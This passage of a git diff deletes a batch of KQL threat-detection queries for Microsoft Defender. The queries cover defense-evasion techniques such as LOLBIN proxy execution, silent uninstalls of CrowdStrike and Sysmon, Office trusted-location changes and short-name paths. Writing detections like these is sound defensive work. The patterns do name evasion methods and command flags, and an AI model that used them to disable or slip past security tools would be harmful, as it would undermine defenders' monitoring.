--- a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harjot Singh @cyb3rjy0t
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql
deleted file mode 100644
index 3f6b0cac..00000000
--- a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql b/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql
deleted file mode 100644
index 44d89cab..00000000
--- a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/04
-// Level: high
-// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql b/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql
deleted file mode 100644
index 141841a4..00000000
--- a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseph Kamau
-// Date: 2024/05/27
-// Level: high
-// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
-Which could be an indicator of "User Defined Functions" abuse to download malware.
-
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql b/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql
deleted file mode 100644
index 167db3f4..00000000
--- a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql b/Defense Evasion/Uncommon_Svchost_Parent_Process.kql
deleted file mode 100644
index 34b8d2cc..00000000
--- a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/08/15
-// Level: medium
-// Description: Detects an uncommon svchost parent process
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceProcessEvents
-| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql b/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql
deleted file mode 100644
index ca6bca6f..00000000
--- a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/12
-// Level: medium
-// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql b/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql
deleted file mode 100644
index 996ee87c..00000000
--- a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/12
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql b/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql
deleted file mode 100644
index 7d3b2fa9..00000000
--- a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/12
-// Level: high
-// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql b/Defense Evasion/Unmount_Share_Via_Net.EXE.kql
deleted file mode 100644
index db69455f..00000000
--- a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2020/10/08
-// Level: low
-// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
deleted file mode 100644
index 61f33107..00000000
--- a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql b/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql
deleted file mode 100644
index a0050001..00000000
--- a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/18
-// Level: medium
-// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql
deleted file mode 100644
index 5cf32ab1..00000000
--- a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql
deleted file mode 100644
index cea6c506..00000000
--- a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/06
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
deleted file mode 100644
index 827d695b..00000000
--- a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql b/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql
deleted file mode 100644
index 23a837f9..00000000
--- a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe", "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veam.backup.shell.exe" or InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe") or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\" or (ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe" or ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Short_Name_Path_in_Image.kql b/Defense Evasion/Use_Short_Name_Path_in_Image.kql
deleted file mode 100644
index 0ff162d4..00000000
--- a/Defense Evasion/Use_Short_Name_Path_in_Image.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Remote.exe.kql b/Defense Evasion/Use_of_Remote.exe.kql
deleted file mode 100644
index 58ed2620..00000000
--- a/Defense Evasion/Use_of_Remote.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/02
-// Level: medium
-// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Scriptrunner.exe.kql b/Defense Evasion/Use_of_Scriptrunner.exe.kql
deleted file mode 100644
index 0c832c20..00000000
--- a/Defense Evasion/Use_of_Scriptrunner.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Setres.exe.kql b/Defense Evasion/Use_of_Setres.exe.kql
deleted file mode 100644
index 8d88bcb7..00000000
--- a/Defense Evasion/Use_of_Setres.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/12/11
-// Level: medium
-// Description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path
-// Tags: attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where FolderPath endswith "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_TTDInject.exe.kql b/Defense Evasion/Use_of_TTDInject.exe.kql
deleted file mode 100644
index c40854dd..00000000
--- a/Defense Evasion/Use_of_TTDInject.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/16
-// Level: medium
-// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql b/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql
deleted file mode 100644
index a392ba2f..00000000
--- a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: medium
-// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql b/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql
deleted file mode 100644
index 3179a894..00000000
--- a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/01
-// Level: medium
-// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Wfc.exe.kql b/Defense Evasion/Use_of_Wfc.exe.kql
deleted file mode 100644
index b0bfabe4..00000000
--- a/Defense Evasion/Use_of_Wfc.exe.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/01
-// Level: medium
-// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql b/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql
deleted file mode 100644
index a0582a37..00000000
--- a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anton Kutepov, oscd.community
-// Date: 2020/02/05
-// Level: high
-// Description: Detects using SettingSyncHost.exe to run hijacked binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1574.008
-DeviceProcessEvents
-| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql b/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql
deleted file mode 100644
index 7ffb6536..00000000
--- a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/28
-// Level: medium
-// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin "
\ No newline at end of file
diff --git a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql b/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql
deleted file mode 100644
index df845624..00000000
--- a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects when verclsid.exe is used to run COM object via GUID
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql b/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql
deleted file mode 100644
index cd684dd2..00000000
--- a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/07
-// Level: high
-// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
deleted file mode 100644
index 76373e3d..00000000
--- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
deleted file mode 100644
index 275a6408..00000000
--- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2023/04/11
-// Level: medium
-// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql b/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql
deleted file mode 100644
index 0a3175de..00000000
--- a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/17
-// Level: medium
-// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
-// Tags: attack.defense_evasion, attack.t1220
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/Defense Evasion/WSL_Child_Process_Anomaly.kql b/Defense Evasion/WSL_Child_Process_Anomaly.kql
deleted file mode 100644
index 83b49b76..00000000
--- a/Defense Evasion/WSL_Child_Process_Anomaly.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/23
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
